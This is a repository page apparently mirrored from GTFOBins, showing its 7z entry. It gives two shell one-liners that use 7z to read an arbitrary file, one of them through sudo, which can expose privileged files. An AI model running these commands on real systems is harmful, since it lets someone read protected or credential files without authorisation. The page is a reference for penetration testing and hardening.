This website requires JavaScript.
Explore
Help
Register
Sign In
mirror
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced
2026-01-04 06:41:39 +01:00
Code
Issues
a4e55ccd5e
GTFOBins.github.io
/
_gtfobins
/
7z.md
Yuta Yamate
8d82a69fb7
Add 7z
...
Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
2022-12-16 12:26:45 +01:00
237 B
Raw
Blame
History
functions
file-read
sudo
code
LFILE=file_to_read 7z a -ttar -an -so $LFILE | 7z e -ttar -si -so
code
LFILE=file_to_read sudo 7z a -ttar -an -so $LFILE | 7z e -ttar -si -so